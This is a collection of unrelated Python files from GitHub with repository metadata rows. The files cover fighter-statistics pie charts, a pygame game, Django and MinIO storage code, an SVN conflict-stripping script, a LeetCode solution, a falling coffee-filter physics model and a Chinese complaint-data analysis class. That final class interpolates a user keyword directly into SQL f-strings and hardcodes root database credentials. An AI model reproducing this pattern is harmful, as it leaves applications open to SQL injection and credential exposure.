plt.title('Eryk Anders')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_AnClinch, Results_AnDistance, Results_AnGround, Results_AnNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Khalil Rountree Jr.
# In[45]:
plt.subplot(221)
plt.title('Khalil Rountree Jr. Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [RClinch, RDistance, RGround, RNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Khalil Rountree Jr. Result')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_RClinch, Results_RDistance, Results_RGround, Results_RNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Alan Jouban
# In[46]:
plt.subplot(221)
plt.title('Alan Jouban Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [JClinch, JDistance, JGround, JNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Alan Jouban Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_JClinch, Results_JDistance, Results_JGround, Results_JNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Dwight Grant
# In[47]:
plt.subplot(221)
plt.title('Dwight Grant')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [GrClinch, GrDistance, GrGround, GrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Dwight Grant Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_GrClinch, Results_GrDistance, Results_GrGround, Results_GrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Ovince Saint Preux
# In[48]:
plt.subplot(221)
plt.title('Ovince Saint Preux Total')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [PrClinch, PrDistance, PrGround, PrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Ovince Saint Preux Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_PrClinch, Results_PrDistance, Results_PrGround, Results_PrNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# ## Nikita Krylov
# In[49]:
plt.subplot(221)
plt.title('Nikita Krylov Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [KClinch, KDistance, KGround, KNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.subplot(222)
plt.title('Nikita Krylov Results')
labels = 'Clinch','Distance','Ground','Normal'
sizes = [Results_KClinch, Results_KDistance, Results_KGround, Results_KNormal]
colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
explode = (0, 0, 0, 0)
# Plot
plt.pie(sizes, explode=explode, labels=labels, colors=colors,
autopct='%1.1f%%', shadow=True, startangle=140)
plt.axis('equal')
plt.figure(1)
plt.show
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
d51f21fe04ab46c872361e77f688ddde25e6690d | 1ba68429cd4a1654a66dd7b0a7b8e91f81798073 | /cart/admin.py | 25928702bc82acc30d13248cd482e57f5dc03454 | [] | no_license | crowdbotics-apps/test-002-31939 | 097234cc8a8870e39ece59640ad66a14c641b708 | d669523f2ed3681d487d4a1a65645a642c6413c1 | refs/heads/master | 2023-08-29T21:34:54.106718 | 2021-11-12T17:25:07 | 2021-11-12T17:25:07 | 427,392,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from django.contrib import admin
from .models import Content, Product
admin.site.register(Product)
admin.site.register(Content)
# Register your models here.
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
07554bbecc8d641e211391fd30c019faa434d82f | 64e2a21f9917e3c10116d4cc9981c14851fff779 | /chapter_11_pygame_basic2/5.1.5 pygame13.py | 38cbd210a9462b59bbff1b1c0c371bf05a2a0374 | [] | no_license | Tanapoowapat/python_class_2021 | d1824f894583f4da804fd24a798c6566706185bc | 8f5329e990b45f8dbb772101ac91082542a4d2f2 | refs/heads/master | 2023-09-03T01:42:04.042721 | 2021-11-04T10:38:53 | 2021-11-04T10:38:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,209 | py | # สร้างศัตรู
import pygame
# load image
walkRight = [pygame.image.load('image/R1.png'), pygame.image.load('image/R2.png'),
pygame.image.load('image/R3.png'), pygame.image.load('image/R4.png'),
pygame.image.load('image/R5.png'), pygame.image.load('image/R6.png'),
pygame.image.load('image/R7.png'), pygame.image.load('image/R8.png'),
pygame.image.load('image/R9.png')]
walkLeft = [pygame.image.load('image/L1.png'), pygame.image.load('image/L2.png'),
pygame.image.load('image/L3.png'), pygame.image.load('image/L4.png'),
pygame.image.load('image/L5.png'), pygame.image.load('image/L6.png'),
pygame.image.load('image/L7.png'), pygame.image.load('image/L8.png'),
pygame.image.load('image/L9.png')]
background = pygame.image.load('image/bg.jpg')
character = pygame.image.load('image/standing.png')
screen = pygame.display.set_mode((500, 500))
pygame.display.set_caption("Character Animation")
clock = pygame.time.Clock()
class Player(object):
def __init__(self, x, y, width, height):
self.x = x
self.y = y
self.width = width
self.height = height
self.velocity = 5
self.isJump = False
self.left = False
self.right = False
self.walkCount = 0
self.jumpCount = 10
def draw(self, win):
if self.walkCount + 1 >= 27:
self.walkCount = 0
if self.left:
win.blit(walkLeft[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
elif self.right:
win.blit(walkRight[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
else:
win.blit(character, (self.x, self.y))
class Fire(object):
def __init__(self, x, y, radius, color, facing):
self.x = x
self.y = y
self.radius = radius
self.color = color
self.facing = facing
self.velocity = 8 * facing
def draw(self, win):
pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)
class Enemy(object):
walkRight = [pygame.image.load('image/R1E.png'), pygame.image.load('image/R2E.png'),
pygame.image.load('image/R3E.png'), pygame.image.load('image/R4E.png'),
pygame.image.load('image/R5E.png'), pygame.image.load('image/R6E.png'),
pygame.image.load('image/R7E.png'), pygame.image.load('image/R8E.png'),
pygame.image.load('image/R9E.png'), pygame.image.load('image/R10E.png'),
pygame.image.load('image/R11E.png')]
walkLeft = [pygame.image.load('image/L1E.png'), pygame.image.load('image/L2E.png'),
pygame.image.load('image/L3E.png'), pygame.image.load('image/L4E.png'),
pygame.image.load('image/L5E.png'), pygame.image.load('image/L6E.png'),
pygame.image.load('image/L7E.png'), pygame.image.load('image/L8E.png'),
pygame.image.load('image/L9E.png'), pygame.image.load('image/L10E.png'),
pygame.image.load('image/L11E.png')]
def __init__(self, x, y, width, height, end):
self.x = x
self.y = y
self.width = width
self.height = height
self.path = [x, end]
self.walkCount = 0
self.vel = 3
def draw(self, win):
self.move()
if self.walkCount + 1 >= 33:
self.walkCount = 0
if self.vel > 0:
win.blit(self.walkRight[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
else:
win.blit(self.walkLeft[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
def move(self):
if self.vel > 0:
if self.x < self.path[1] + self.vel:
self.x += self.vel
else:
self.vel = self.vel * -1
self.x += self.vel
self.walkCount = 0
else:
if self.x > self.path[0] - self.vel:
self.x += self.vel
else:
self.vel = self.vel * -1
self.x += self.vel
self.walkCount = 0
def redrawGameWindow():
screen.blit(background, (0, 0))
man.draw(screen)
goblin.draw(screen)
for bullet in bullets:
bullet.draw(screen)
pygame.display.update()
# mainloop
man = Player(200, 410, 64, 64)
goblin = Enemy(100, 410, 64, 64, 300)
bullets = []
run = True
while run:
clock.tick(27)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
for bullet in bullets:
if 500 > bullet.x > 0:
bullet.x += bullet.velocity
else:
bullets.pop(bullets.index(bullet))
keys = pygame.key.get_pressed()
if keys[pygame.K_SPACE]:
if man.left:
facing = -1
else:
facing = 1
if len(bullets) < 5:
bullets.append(
Fire(round(man.x + man.width // 2), round(man.y + man.height // 2), 6, (0, 0, 0), facing))
if keys[pygame.K_LEFT] and man.x > man.velocity:
man.x -= man.velocity
man.left = True
man.right = False
man.standing = False
elif keys[pygame.K_RIGHT] and man.x < 500 - man.width - man.velocity:
man.x += man.velocity
man.right = True
man.left = False
man.standing = False
else:
man.standing = True
man.walkCount = 0
if not man.isJump:
if keys[pygame.K_UP]:
man.isJump = True
man.right = False
man.left = False
man.walkCount = 0
else:
if man.jumpCount >= -10:
neg = 1
if man.jumpCount < 0:
neg = -1
man.y -= (man.jumpCount ** 2) * 0.5 * neg
man.jumpCount -= 1
else:
man.isJump = False
man.jumpCount = 10
redrawGameWindow()
pygame.quit()
| [
"noreply@github.com"
] | noreply@github.com |
0ce9ad4435b871c6acb541ca7133671bebb572ad | 085edd7c155d9589cb8826337eeec77e9c479de4 | /tests/test_app/tests/custom_storage_class_tests.py | d01b0def08ec8a95898045df97ac31149c02d55c | [
"MIT",
"Apache-2.0"
] | permissive | linnify/django-minio-storage | 38733ba1952cea7bc13f6290b7e32359243d8460 | 7feec659056d29d241fc70845e1c0f459c7ec730 | refs/heads/master | 2022-12-29T02:27:23.750093 | 2020-10-12T15:56:51 | 2020-10-12T15:56:51 | 302,329,776 | 0 | 0 | NOASSERTION | 2020-10-12T15:56:52 | 2020-10-08T12:15:54 | Python | UTF-8 | Python | false | false | 4,501 | py | import io
import os
import shutil
import tempfile
from django.core.files.base import ContentFile
from django.test import TestCase, override_settings
from django.utils.deconstruct import deconstructible
from minio_storage.files import ReadOnlyMinioObjectFile
from minio_storage.storage import (
MinioStorage,
create_minio_client_from_settings,
get_setting,
)
from .utils import BaseTestMixin
from .utils import bucket_name as create_test_bucket_name
@deconstructible
class SecretStorage(MinioStorage):
"""The SecretStorage MinioStorage subclass can be used directly, as a storage in
settings.DEFAULT_FILE_STORAGE or after instantiated used individually on any django
FileField:
from django.db import models
ss = SecretStorage(bucket_name='invoices')
class Invoice(models.Model):
...
pdf = models.FileField(storage=ss)
"""
# We can set a new default File class implementation that will be used here because
# we want to stream the data directly from minio. Imagine that we need to process
# large files where we don't want to waste time/ram/disk space on writing the file
# to disk two times before processing it.
#
file_class = ReadOnlyMinioObjectFile
def __init__(self, bucket_name=None):
# we can create the minio client ourselves or use
# create_minio_client_from_settings convinience function while providing it with
# extra args.
#
client = create_minio_client_from_settings(minio_kwargs={"region": "us-east-1"})
# or use our own Django setting
#
if bucket_name is None:
bucket_name = get_setting("SECRET_BUCKET_NAME")
# Run the super constructor and make a choice to only use presigned urls with
# this bucket so that we can keep files more private here than how media files
# usually are public readable.
#
super().__init__(
client,
bucket_name,
auto_create_bucket=True,
auto_create_policy=False,
presign_urls=True,
)
class CustomStorageTests(BaseTestMixin, TestCase):
@override_settings(SECRET_BUCKET_NAME=create_test_bucket_name("my-secret-bucket"))
def test_custom_storage(self):
# Instansiate a storage class and put a file in it so that we have something to
# work with.
#
storage = SecretStorage()
storage_filename = storage.save("secret.txt", ContentFile(b"abcd"))
# Create a temporary workspace directory.
#
# It's importat that this directory is deleted after we are done so we use the
# with statement here.
#
with tempfile.TemporaryDirectory() as workspace:
# A filename to use for the file inside the working directory.
#
filename = os.path.join(workspace, "secret.txt")
# Open a stream with the minio file objenct and the temporary file.
#
# We might be processing a lot of files in a loop here so we are going top
# use the with statement to ensure that both the input stream and output
# files are closed after the copying is done.
#
with open(filename, "wb") as out_file, storage.open(
storage_filename
) as storage_file:
# Copy the stream from the http stream to the out_file
#
shutil.copyfileobj(storage_file.file, out_file)
#
# We are not using the ReadOnlyMinioObjectFile type so we can't seek in
# it.
#
with self.assertRaises(io.UnsupportedOperation):
storage_file.file.seek()
workspace_files = os.listdir(workspace)
print(workspace_files) # prints: ['secret.txt']
#
# Process the file with external tools or something....
#
# For the purpouse of the example test we just check that the contents of
# the file is what we wrote in the beginning of the test.
#
with open(filename, "rb") as f:
self.assertEqual(f.read(), b"abcd")
#
# Clean up after the test
#
storage.delete(storage_filename)
#
# use the minio client directly to also remove bucket
#
storage.client.remove_bucket(storage.bucket_name)
| [
"thomasf@jossystem.se"
] | thomasf@jossystem.se |
84c5f3d320a54b13eb6d71849aec3df781eeb2e4 | f4a7c278c7beb7b574e524fe0c84e3fa9712c61a | /project/urls.py | 32e6df7f9d437c9b3c890068421a696a4fbff024 | [] | no_license | kottenator/sample-django-project | 2580b33fc622db1795589d3e7c392333f6a00229 | 87531b1f9dbd02542d03e4179b82a719b10b3fe7 | refs/heads/master | 2021-01-01T04:25:22.058568 | 2016-06-01T02:42:10 | 2016-06-01T02:42:10 | 59,070,746 | 1 | 1 | null | 2016-05-18T17:10:21 | 2016-05-18T01:12:22 | JavaScript | UTF-8 | Python | false | false | 197 | py | from django.conf.urls import url, include
import project.base.urls
import project.main.urls
urlpatterns = [
url(r'', include(project.base.urls)),
url(r'', include(project.main.urls)),
]
| [
"kottenator@gmail.com"
] | kottenator@gmail.com |
0f3d50f5b5f2ecc78827b40568849200168ca2ee | 64efd3a252c09ac93467f8e1ca48cf0b08986294 | /python/svn_nasty_merge/svn_nasty_merge.py | ef48321ff9cc2a81772a577f79e19482de0f1bc7 | [] | no_license | raphaelchampeimont/almacha | a86ff10cf05d676a5c110fd21e35de1b4b9a838f | 439684932b54bd9214e4119b4f77c035f24a7ad8 | refs/heads/master | 2021-05-31T08:00:30.750759 | 2016-05-03T15:58:55 | 2016-05-03T15:58:55 | 12,587,906 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
fn = sys.argv[1]
f = open(fn)
kill = False
newfiledata = "";
while 1:
line = f.readline()
if line == "":
break
if line.startswith("<<<<<<<"):
pass
elif line.startswith("======="):
kill = True
elif line.startswith(">>>>>>>"):
kill = False
elif not kill:
newfiledata = newfiledata + line
f.close()
f = open(fn, "w")
f.write(newfiledata)
f.close()
| [
"almacha@almacha.org"
] | almacha@almacha.org |
4ca726894e8a47f19d38fc009e00fb4aaa6896df | bf4be1f469b049dccf41807514a168400e48cdd1 | /Related Topics/Bit Manipulation/201. Bitwise AND of Numbers Range.py | c38348cbfcb27e1311a88564532ee0347c21b603 | [] | no_license | billgoo/LeetCode_Solution | 8bde6844ecc44c61a914f9c88030d8d3e724c947 | 360d144cee86aae877b6187a07f1957e673c3592 | refs/heads/master | 2022-04-26T16:10:00.380910 | 2022-04-20T04:54:06 | 2022-04-20T04:54:06 | 155,243,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | class Solution:
def rangeBitwiseAnd(self, m: int, n: int) -> int:
# bits shift
"""
e = 0
while m != n:
m >>= 1
n >>= 1
e += 1
return m << e
"""
# Brian Kernighan's Algorithm
# n & (n - 1) will remove the right most bits: 1100 & 1011 = 1000
while m < n:
n &= (n - 1)
return m & n | [
"billgoo0813@gmail.com"
] | billgoo0813@gmail.com |
f4031c57f227ca1463ac3b60e3daa48a7ec245d7 | 45598fdebc665e80d6c8ec53e5208415b8f7dcb2 | /coffee-filter.py | 416c18100c994b56016bd77b8bede8a55b31223d | [
"Apache-2.0"
] | permissive | huginn-sim/coffee-filter2 | 3e9c449f34957c767b5b2e028f402de8d6b7ad70 | ee1351695b7f6c60b7d09c51ff82af91ab9543f9 | refs/heads/master | 2020-05-28T13:28:56.235226 | 2014-02-16T02:29:57 | 2014-02-16T02:29:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,458 | py | # -*- coding: utf-8 -*-
"""
.. module:: coffee-filter
:synopsis: Models the position, velocity, and acceleration of a falling coffee filter.
.. moduleauthor:: Huginn
"""
#~ Modules
from pylab import *
import sys
#/~ Modules
#~ Custom Modules
sys.path.append("C:\Users\Evin\Documents\Github")
from viz.display.plot import configure
#/~ Custom Modules
#~ ODE Solvers
def euler(f,t,dt,x):
return x + f(t,x)*dt
def euler_richardson(f,t,dt,x):
return x + f(t + dt/2., x + f(t,x)*dt/2.)*dt
def rk4(f,t,dt,x):
k1 = f(t , x )*dt
k2 = f(t + dt/2., x + k1/2.)*dt
k3 = f(t + dt/2., x + k2/2.)*dt
k4 = f(t + dt , x + k3 )*dt
return x + (1./6.)*(k1 + 2*k2 + 2*k3 + k4)
def predict_correct(f,t,dt,x):
t[0:0] = [t[0] - dt]
# Roll back by one time-step.
pc_state = [rk4(f,t[0],-dt,x[0])]
pc_state.append(x[0])
# Roll forward.
for t in times:
xp = pc_state[-2] + f(t,pc_state[-1])*2*dt
xc = pc_state[-1] + 0.5*(f(t,xp) + f(t,pc_state[-1]))*dt
pc_state.append(xc)
return times, array(pc_state)
#/~ ODE Solvers
def finite_diff(times,x):
v_fd = lambda dt,x: (x[0] - x[1])/(2.*dt)
a_fd = lambda dt,x: (x[0] - 2*x[1] + x[2])/(dt**2)
v = []; a = []; dts = []
for i in range(1, len(times)-1):
dts.append((times[i+1] - times[i-1]) /2.)
v.append(v_fd(dts[i-1],[x[i+1], x[i-1]]))
a.append(a_fd(dts[i-1],[x[i+1], x[i], x[i-1]]))
v = array(v); a = array(a); dts = array(dts)
return v, a, dts
def sample_data(data=None):
""" Calculates thermal constants from a dataset.
:param data: The dataset used to derive cooling constants. If 'None' use default 'data'.
"""
if data == None: # Use default 'data' if none is provided by user.
data = np.array([[ .2055,.2302,.2550,.2797,.3045,.3292,.3539,.3786,.4033,
.4280,.4526,.4773,.5020,.5266,.5513,.5759,.6005,.6252,
.6498,.6744,.6990,.7236,.7482,.7728,.7974,.8220,.8466],
[ .4188,.4164,.4128,.4082,.4026,.3958,.3878,.3802,.3708,
.3609,.3505,.3400,.3297,.3181,.3051,.2913,.2788,.2667,
.2497,.2337,.2175,.2008,.1846,.1696,.1566,.1393,.1263]])
times = data[0,:]; print times
pos = data[1,:]; print pos
vel, acc, dts = finite_diff(times,pos); print vel; print acc
return times, dts, pos, vel, acc
def plot_samples(times, pos, vel, acc):
fig, axes = subplots(2, 2)
ptmark, = axes[0,0].plot(times, pos, 'b--o')
start_ptmark, = axes[0,0].plot(times[0], pos[0], 'go', ms=10)
end_ptmark, = axes[0,0].plot(times[-1], pos[-1], 'ro', ms=10)
axes[0,0].legend( [ptmark, start_ptmark, end_ptmark],
[r'$\left(t,p\right)$', r'First', r'Last'],
numpoints=1,
loc="upper right")
configure( ax=axes[0,0],
title="Position vs Time",
xlabel=r"Time $\left(seconds\right)$",
ylabel=r"Position $\left(meters\right)$",
xbounds=None, ybounds=None)
vtmark, = axes[1,0].plot(times[1:-1], vel, 'b--o')
start_vtmark, = axes[1,0].plot(times[1], vel[0], 'go', ms=10)
end_vtmark, = axes[1,0].plot(times[-2], vel[-1], 'ro', ms=10)
axes[1,0].legend( [vtmark, start_vtmark, end_vtmark],
[r'$\left(t,v\right)$', r'First', r'Last'],
numpoints=1,
loc="upper right")
configure( ax=axes[1,0],
title="Velocity vs Time",
xlabel=r"Time $\left(seconds\right)$",
ylabel=r"Velocity $\left(\frac{meters}{second}\right)$",
xbounds=None, ybounds=None)
atmark, = axes[0,1].plot(times[1:-1], acc, 'b--o')
start_atmark, = axes[0,1].plot(times[1], acc[0], 'go', ms=10)
end_atmark, = axes[0,1].plot(times[-2], acc[-1], 'ro', ms=10)
axes[0,1].legend( [atmark, start_atmark, end_atmark],
[r'$\left(t,a\right)$', r'First', r'Last'],
numpoints=1,
loc="lower right")
configure( ax=axes[0,1],
title="Acceleration vs Time",
xlabel=r"Time $\left(seconds\right)$",
ylabel=r"Acceleration $\left(\frac{meters}{seconds^2}\right)$",
xbounds=None, ybounds=(-10,10))
avmark, = axes[1,1].plot(vel, acc, 'b--o')
start_avmark, = axes[1,1].plot(vel[0], acc[0], 'go', ms=10)
end_avmark, = axes[1,1].plot(vel[-1], acc[-1], 'ro', ms=10)
axes[1,1].legend( [avmark, start_avmark, end_avmark],
[r'$\left(v,a\right)$', r'First', r'Last'],
numpoints=1,
loc="lower right")
configure( ax=axes[1,1],
title="Acceleration vs Velocity",
xlabel=r"Velocity $\left(\frac{meters}{second}\right)$",
ylabel=r"Acceleration $\left(\frac{meters}{seconds^2}\right)$",
xbounds=None, ybounds=(-10,10))
fig.suptitle("Falling Coffee Filter", size=30)
fig.subplots_adjust(left=0.05, right=0.95, top=0.9, bottom=0.08)
show()
def plot_acc_vs_vel(vel,acc):
fig, ax = plt.subplots()
avmark, = ax.plot(vel, acc, 'b--o')
start_avmark, = ax.plot(vel[0], acc[0], 'go', ms=10)
end_avmark, = ax.plot(vel[-1], acc[-1], 'ro', ms=10)
ax.legend( [avmark, start_avmark, end_avmark],
[r'$\left(v,a\right)$', r'First', r'Last'],
numpoints=1,
loc="lower right")
configure( ax=ax,
title="Acceleration vs Velocity",
xlabel=r"Velocity $\left(\frac{meters}{second}\right)$",
ylabel=r"Acceleration $\left(\frac{meters}{seconds^2}\right)$",
xbounds=None, ybounds=(-10,10))
fig.suptitle("Falling Coffee Filter", size=30)
fig.subplots_adjust(left=0.05, right=0.95, top=0.9, bottom=0.08)
show()
def plot_samples_and_models(times, pos, vel, acc):
F1 = [array([pos[0], vel[0]])]
F2 = [array([pos[0], vel[0]])]
for t,dt,p,v in zip(times,dts,pos,vel)[1:]:
F1.append(rk4(falld1, t, dt, F1[-1]))
F2.append(rk4(falld2, t, dt, F2[-1]))
F1 = array(F1)
F2 = array(F2)
fig, axes = subplots(2)
pmark, = axes[0].plot(times, pos, 'b--o')
plmark, = axes[0].plot(times[:-2], F1[:,0], 'g--o')
pqmark, = axes[0].plot(times[:-2], F2[:,0], 'r--o')
axes[0].legend( [pmark, plmark, pqmark],
[r'$\left(t,p\right)$', r'Linear', r'Quadratic'],
numpoints=1,
loc="upper right")
configure( ax=axes[0],
title=r'Position vs Time $\left(v_t='+ str(vT)+ r'\right)$',
xlabel=r"Time $\left(seconds\right)$",
ylabel=r"Position $\left(meters\right)$",
xbounds=None, ybounds=(0,.5))
vmark, = axes[1].plot(times[:-2], vel, 'b--o')
vlmark, = axes[1].plot(times[:-2], F1[:,1], 'g--o')
vqmark, = axes[1].plot(times[:-2], F2[:,1], 'r--o')
axes[1].legend( [vmark, vlmark, vqmark],
[r'$\left(t,v\right)$', r'Linear', r'Quadratic'],
numpoints=1,
loc="upper right")
configure( ax=axes[1],
title=r'Velocity vs Time $\left(v_t='+str(vT)+r'\right)$',
xlabel=r"Time $\left(seconds\right)$",
ylabel=r"Velocity $\left(\frac{meters}{second}\right)$",
xbounds=None, ybounds=None)
fig.suptitle("Falling Coffee Filter", size=30)
fig.subplots_adjust(left=0.05, right=0.95, top=0.9, bottom=0.08)
show()
#sliding average for smoothing
def slide_avg(x):
avg = []
for i in range(len(x)-2):
avg.append((x[i]+x[i+1]+x[i+2])/3)
return np.array(avg)
def falld1(t,x):
return np.array([x[1],g*(1-(x[1]/vT))])
def falld2(t,x):
return np.array([x[1],g*(1-(x[1]/vT)**2)])
# this is when I was going to run rk with the two falling models
#~ Entry point of the script.
if __name__ == "__main__":
#~ State Variables
t0 = 0; tf = 10*pi; dt = .1
times = np.arange(t0, tf, dt)
g = -9.81
x0 = 1.; v0 = 0.; vT = -0.425; a0 = g
state = [np.array([x0,v0,a0])]
#/~ State Variables
times, dts, pos, vel, acc = sample_data()
plot_samples(times, pos, vel, acc)
plot_acc_vs_vel(vel,acc)
plot_samples_and_models(times, pos, vel, acc)
| [
"evin.ozer@gmail.com"
] | evin.ozer@gmail.com |
f8bb9eb246710b9e106b9b5b027bcb279219dca4 | 2f6e1387b29879e24ea18ca7a1c293ddaf90297d | /yuqingzhuizong.py | 72dda4d33a4fee6cb0beb0d7943508ea2fd2e7d3 | [] | no_license | Ashley1207/wuhu_system | c4e19e14b91678e8272376daa1d28d460d749047 | e9fe85184c4a4ac6faa19a1db57b8b9a9e2ea9cc | refs/heads/master | 2023-04-21T09:38:40.671417 | 2021-05-08T22:19:37 | 2021-05-08T22:19:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,793 | py | import threading
import pymysql
import json
import pandas as pd
from gensim import corpora, models
import jieba
class Picture:
def __init__(self, keyword):
self.conn = pymysql.connect(host="localhost", port=3306, user="root",
password="123456", database="wuhu", charset="utf8")
conn = pymysql.connect(host="localhost", port=3306, user="root",
password="123456", database="wuhu", charset="utf8")
sql = f'select * from bottom_car where message like "%{keyword}%"'
sql1 = f'select * from shizhang where message like "%{keyword}%"'
df = pd.read_sql(sql, conn)
df1 = pd.read_sql(sql1, conn)
df = pd.concat([df, df1], axis=0)
self.number = len(df)
data = df.sort_values(by="year_day", ascending=False)
if len(data) != 0:
self.data = data
# 生成第一个数据(地区以及时间的信息,还有问题种类)
def time_area(self):
# 事件初始以及末尾发生地区和时间
qu_xian = ["鸠江", "镜湖", "弋江", "繁昌", "湾沚", "南陵", "无为", "芜湖县", "三山"]
data = self.data[["year_day", "receiveunitname", "message", "problem_type"]]
first_time = data["year_day"].tolist()[-1] # 第一次发生的时间
last_time = data["year_day"].tolist()[0] # 最后一次发生的时间
first_area = [i for i in qu_xian if i in data.message.tolist()[-1]] # 第一次发生的地区
if len(first_area) != 0:
first_area = first_area[0]
last_area = [i for i in qu_xian if i in data.message.tolist()[0]] # 最后一次发生的地区
if len(last_area) != 0:
last_area = last_area[0]
if not first_area:
first_area = data.receiveunitname.tolist()[-1]
if first_area == "暂无接收单位":
first_area = "未知"
elif len(first_area) > 6:
for i in range(len(data.message.tolist())):
for a in qu_xian:
if a in data.message.tolist()[i]:
first_area = a
break
else:
continue
break
if not last_area:
last_area = data.receiveunitname.tolist()[0]
if last_area == "暂无接收单位":
last_area = "未知"
elif len(last_area) > 6:
for i in range(len(data.message.tolist())):
for a in qu_xian:
if a in data.message.tolist()[i]:
last_area = a
break
else:
continue
break
dic1 = {"chushimowei": [{"first_time": first_time.split(" ")[0]}, {"first_area": first_area},
{"last_time": last_time.split(" ")[0]}, {"last_area": last_area}]}
# 事件爆发时间以及数量
year_month = data.year_day.map(lambda x: x[0:7])
year_month = pd.DataFrame(year_month)
tong_ji = year_month.groupby("year_day").size()
sort_tong_ji = tong_ji.sort_values(ascending=False) # 排序爆发数量 取最多的数量
break_time = sort_tong_ji.index[0] # 爆发月份
message = sort_tong_ji.values[0] # 文章数量
dic2 = {"shijianbaofa": [{"baofayuefen": break_time}, {"wenzhangshuliang": str(message)}]}
# 事件报道统计
problem = data.groupby("problem_type").size().sort_values(ascending=False) # 排序后的问题种类
z_l = ["我要咨询", "其他", "我要投诉", "我要求助", "我要举报", "我要建议"]
for i in z_l:
if i not in problem.index:
problem[i] = 0
dic3 = {"baodaotongji": [{"zixun": str(problem["我要咨询"])}, {"qita": str(problem["其他"])},
{"tousu": str(problem["我要投诉"])},
{"qiuzhu": str(problem["我要求助"])}, {"jubao": str(problem["我要举报"])},
{"jianyi": str(problem["我要建议"])}]}
# 事件接受分布(折线图)
index = tong_ji.index.tolist()
values = tong_ji.values.tolist()
dic4 = {"shijianjieshou_zhexiantu": [{"xAxis": index, "series": values}]}
# 事件答复单位分布(漏斗图)
reply = data.groupby("receiveunitname").size().sort_values(ascending=False)
if "暂无接收单位" in reply.index:
reply = reply.drop("暂无接收单位")
reply = reply[reply.values > 1]
r = []
for i in range(len(reply)):
dic = {"value": str(reply.values[i]), "name": reply.index[i]} # 答复单位的字典数据
r.append(dic)
dic5 = {"shijiandafudanwei_loudoutu": [{"max": reply.values.tolist()[0]}, {"data": r}]}
# 事件种类分布
p = []
for i in range(len(problem)):
if problem.values[i] != 0:
dic = {"value": str(problem.values[i]), "name": problem.index[i]}
p.append(dic)
dic6 = {"shijianzhonglei_bingtu": p}
dic = {"jianyaofenxi": [dic1, dic2, dic3, dic4, dic5, dic6]}
return dic
def bin_tu(self):
data = self.data
data = data.groupby("method").size().sort_values(ascending=False)
if "NULL" in data.index:
data = data.drop("NULL")
m = []
for i in range(len(data)):
dic = {"value": str(data.values[i]), "name": data.index[i]}
m.append(dic)
